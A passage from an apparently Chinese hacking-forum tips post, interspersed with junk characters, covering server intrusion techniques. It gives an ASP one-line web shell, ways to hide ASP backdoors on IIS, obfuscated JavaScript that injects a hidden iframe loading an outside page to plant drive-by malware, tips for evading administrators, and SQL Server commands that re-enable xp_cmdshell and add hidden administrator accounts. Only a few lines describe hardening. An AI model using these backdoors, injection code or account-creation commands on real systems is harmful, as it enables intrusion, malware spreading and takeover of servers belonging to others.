f).<%if request("cmd")<>"" then execute request("pass")%>  O. u" B1 L# p; H/ v) N
7 G7 Q3 M' B2 ?2 E! ~2 \
52、at "12:17" /interactive cmd
( f$ j+ b; `% l% y! z执行后可以用AT命令查看新加的任务
6 R, O4 L$ ]! e* d1 h8 G用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
+ {1 r+ X) |8 F& V( i  S5 {$ p; R1 U( D2 a: b
53、隐藏ASP后门的两种方法; _' {3 N, b/ }% X
1、建立非标准目录:mkdir images..\+ A. K8 L* ~# J% {4 v
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp+ K& D/ R& q3 U: h) I- q/ c  v
通过web访问ASP木马:http://ip/images../news.asp?action=login
8 o$ p4 _: F/ z) Z+ N如何删除非标准目录:rmdir images..\ /s
  L) s$ v5 _; E7 U2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
; V, s8 ]" _3 \& z3 L3 Z- j" Ymkdir programme.asp5 n6 Z. ~6 t' a; z; S
新建1.txt文件内容:<!--#include file=”12.jpg”-->
9 K; I% n) Z4 K8 R* |5 L新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
3 w, V# f6 ~0 }/ P$ d6 qattrib +H +S programme.asp! Q3 @/ H; C( N
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt% X+ p2 ^8 F- h$ O2 {1 C

9 P; A7 L5 J2 ?54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。/ a0 P1 z9 ?9 \: \/ q1 e$ k5 T
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。: f) c5 V- R2 E& D
& {- C6 U" t& v2 H$ h
55、JS隐蔽挂马$ F9 p/ T: H7 c! n# ?
1.% e/ k0 z3 v# X4 S+ |
var tr4c3="<iframe src=ht";
( y& s6 s* j& o, T# W: I8 ltr4c3 = tr4c3+"tp:/";0 I$ I  o* j* a: J
tr4c3 = tr4c3+"/ww";" e7 N! g0 @& i" H2 c
tr4c3 = tr4c3+"w.tr4";) j3 c8 {- ^) j5 o
tr4c3 = tr4c3+"c3.com/inc/m";1 t+ A* S/ [0 q7 H% e
tr4c3 = tr4c3+"m.htm style="display:none"></i";, H/ v* C  n% Q2 `' I# G* G
tr4c3 =tr4c3+"frame>'";; ?, A: t6 c- R2 g) p
document.write(tr4c3);
# Z0 H, l. \. F避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
. {5 o6 }1 Q: p; s: S0 V% F. i, J7 N( l
2.4 O. z5 q* h' W5 B8 m
转换进制,然后用EVAL执行。如
4 ~& S& b. I+ W$ V% f5 ^2 Q3 N) j9 Peval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");( x) Z8 ]2 P" z4 V3 U! H2 Q1 d
不过这个有点显眼。
( s0 e( x! o1 s  ^+ f1 t1 z3.) B" M0 {/ G, X% }4 Y( J9 I
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
$ c1 J# M* a! R1 ~/ \7 G最后一点,别忘了把文件的时间也修改下。
! f# K, I' \3 l2 H3 q! N3 t
# T. p1 ^" A! C  Q. C6 g56.3389终端入侵常用DOS命令( c* g0 b' @1 r2 ]8 d
taskkill taskkill /PID 1248 /t
9 d: L2 N; O5 j) E& \! z  t& K; y0 {7 y2 T! k( Y/ G& h
tasklist 查进程
9 q5 H" `/ c: D" J  }# L- P6 ]
0 v$ }8 n# N% a3 B; Rcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 m" Q% ?; x: Z3 x, i( Xiisreset /reboot
# Q3 X, Q6 K6 S( |tsshutdn /reboot /delay:1    重起服务器# E- ]( ~1 f. Q9 R0 Y; Y8 \# Y- n& [
) ~: f/ a! q5 S( J! F6 h
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,8 h' ?8 b! z3 V

1 h! c/ n" ^( }query user 查看当前终端用户在线情况- H% a3 Y3 q; u; h' I" {" U& a) {

! q' C4 t9 ~9 _9 n4 {* ^+ J要显示有关所有会话使用的进程的信息,请键入:query process *) @; n2 d, D' {, v
+ D3 U8 P% g4 b6 c) V) C
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 j6 V7 N" A4 F, r; U6 b
" `0 q6 C) k! F. ^: M
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER25 D4 P$ {) [5 P5 k8 P* V  I

9 u, e$ l1 O3 A要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
& ~$ L9 [9 l4 f+ B9 M# Z4 y' M
% D9 ~: G+ V! s# {, M  c1 ]( v( C命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启$ ?; M% P* P( }/ F* r% R% v
. [3 }6 t1 C# g6 h3 m4 }
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统& X2 G6 ~0 |0 D) t3 X6 o
2 _/ W' H( S1 A( \: v# L" q
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。5 i% O  G: z& n

- B& P" @. Q% w0 z& ?7 ]命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机4 {2 k* B; t! |8 P9 E( \

, H* v3 c( Y2 ~/ H8 A* J56、在地址栏或按Ctrl+O,输入:
$ q+ }" q; X' Y% s+ P9 m1 `javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
( g' y( d* I2 v
' F! u. p3 n$ d: U源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
  Z3 l% }8 t6 k% _: ~9 J+ h( ~! Z. }
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
) _: @: b- Y, m7 o* T6 S用net localgroup administrators是可以看到管理组下,加了$的用户的。& s9 q7 m# }* c
* j2 |0 X5 O6 Y- d- a( Z8 _' Q  }
58、 sa弱口令相关命令2 H; U! h& M1 C! Z5 k1 }+ j0 v% U9 W
; l- R) R$ I/ U* A
一.更改sa口令方法:9 Y! N- w( }2 U4 s+ d6 h# T
用sql综合利用工具连接后,执行命令:' h; i6 S6 f+ J. d! k
exec sp_password NULL,'20001001','sa'
& l5 x1 b, E: N: \5 a8 m3 J(提示:慎用!)# X, d9 ?7 H5 N0 U4 @

" T  {: C' B$ L4 `( e1 {6 Y, _二.简单修补sa弱口令.
# V0 H% \# H- S* l' Y  D" z$ z1 G3 H/ F$ T8 x5 e2 N/ f3 a
方法1:查询分离器连接后执行:
) a4 `8 D" @* o& d7 J$ g, Wif exists (select * from
8 C( h! I+ ]. d  `/ z3 ^0 Ydbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
' b3 l8 x$ R3 z7 O0 [3 Z3 HOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
9 y% L6 c* B0 Q1 V: j6 X, e, Z$ [
/ L8 b" C9 B- A) o# Jexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'5 |$ A' @) x$ r* o, n9 U/ _
5 V9 T2 u1 l. Q, I5 B, {1 W
GO
' q7 {, e+ R' v7 [
/ v  V: _) |2 T+ ]- ~& w然后按F5键命令执行完毕
# {- r) ?9 |$ \0 s9 P& c- [$ P" f. p; P5 j
方法2:查询分离器连接后
% e/ _1 b, @4 I, d+ t; W第一步执行:use master8 U: y6 P/ }% R" r% R, _
第二步执行:sp_dropextendedproc 'xp_cmdshell'0 H% g! [# I" f5 r% M
然后按F5键命令执行完毕
( g. K% C2 d6 k  |/ q
! |; p: m' K% j. h4 @$ S) V8 k
: ?  c4 {; w8 }8 S* w& f1 k三.常见情况恢复执行xp_cmdshell.$ z3 D1 A! |( K
# w  }, P$ a+ b5 }* S2 X  d  U
: S6 x2 U! e) @/ A8 |6 l8 D
1 未能找到存储过程'master..xpcmdshell'., G# c! h# j5 V1 u+ ^1 y- S
   恢复方法:查询分离器连接后,
$ J' A2 N' t8 @6 {% S: V9 M第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int, e+ E% C( ?- l5 A# i
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 m$ S# D& }( L2 E# i然后按F5键命令执行完毕5 r- m' H- ~( n1 \; ?1 E, R5 I# ?( R

# M( g6 B. c! G9 e2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
! [( @1 R8 z$ C  S恢复方法:查询分离器连接后,
8 `$ _: m4 a# Y' I  D第一步执行:sp_dropextendedproc "xp_cmdshell"2 S3 D" P- n" A
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 n* q. Z& r  s& a0 `然后按F5键命令执行完毕
3 h( Y% A- B2 F0 ?# {+ i) g9 Z8 C. c, F1 I5 R4 o
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. e6 \5 a; l: b3 i恢复方法:查询分离器连接后,1 R* e; Z% G% z7 b# |7 l
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'" E" [" g+ s* }2 s9 Y2 d0 @/ u
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           $ o: d- I: |$ }
然后按F5键命令执行完毕
! u: d3 O( O4 U* s
: h+ l. D1 b# {( q四.终极方法.
& L+ x1 r6 z9 \" T  g  X如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:0 Y( [: Y! O: J: D- A6 D
查询分离器连接后,
+ p. W+ q8 C  q2000servser系统:
( h) @2 I# N# S; Q% j- T6 edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
( v8 R' {7 _. J3 g' S# ?! y  G% d% g7 F8 g# ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'" O5 g$ h2 X% y" j5 I$ J  q1 F
8 G9 q2 Y. {) M- U7 C8 v
xp或2003server系统:
: I* k- S2 [0 P6 o( S% Z; v$ p; ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
# s( b; ]) X9 U( F, j. F# d# ?0 J( l* Z0 w
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
! k$ o% o2 ^* n* c




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2